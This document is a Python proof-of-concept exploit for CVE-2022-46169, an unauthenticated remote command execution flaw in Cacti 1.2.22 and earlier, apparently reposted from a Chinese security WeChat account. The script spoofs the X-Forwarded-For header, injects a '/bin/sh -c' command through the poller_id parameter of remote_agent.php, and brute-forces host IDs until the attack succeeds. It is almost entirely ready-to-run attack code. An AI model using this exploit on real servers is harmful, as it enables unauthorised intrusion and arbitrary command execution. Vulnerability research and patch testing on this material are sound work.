positional arguments:
target URL of the Cacti application.
optional arguments:
-f FILE File containing the command
-c CMD Command
--n_host_ids The range of host_ids to try (0 - n)
--n_local_data_ids The range of local_data_ids to try (0 - n)import requests import argparse parser = argparse.ArgumentParser( prog='Poc for CVE-2022-46169', description='Exploit Unauthenticated RCE on Cacti <= 1.2.22', epilog='Author: saspect') parser.add_argument('target', help='URL of the Cacti application.') group = parser.add_mutually_exclusive_group(required=True) group.add_argument('-f', type=argparse.FileType(), help='File containing the command', dest='file') group.add_argument('-c', help='Command', dest='cmd') parser.add_argument( '--n_host_ids', help='The range of host_ids to try (0 - n)', default=100, dest='n_ids', type=int) parser.add_argument( '--n_local_data_ids', help='The range of local_data_ids to try (0 - n)', default=50, dest='n_localids', type=int) args = parser.parse_args() if args.file: # The '-f' argument is supplied, read the command from the file cmd = args.file.read().strip() elif args.cmd: # The '-c' argument is supplied, use it as the command cmd = args.cmd else: # No command was supplied, print an error message parser.print_help() exit(1) payload = f'; /bin/sh -c "{cmd}"' local_data_ids = [x for x in range(0, args.n_localids)] target_ip = args.target.split("/")[2] print(f"[*] Trying for 1 - {args.n_ids} host ids") for id in range(args.n_ids): url = f'{args.target}/remote_agent.php' params = {'action': 'polldata', 'host_id': id, 'poller_id': payload, 'local_data_ids[]': local_data_ids} headers = {'X-Forwarded-For': target_ip} r = requests.get(url, params=params, headers=headers) if('cmd.php' in r.text): print(f"[+] Exploit Completed for host_id = {id}") break
原文始发于微信公众号(Khan安全攻防实验室):CVE-2022-46169 的 PoC – Cacti <= 1.2.22 上未经身份验证的 RCE
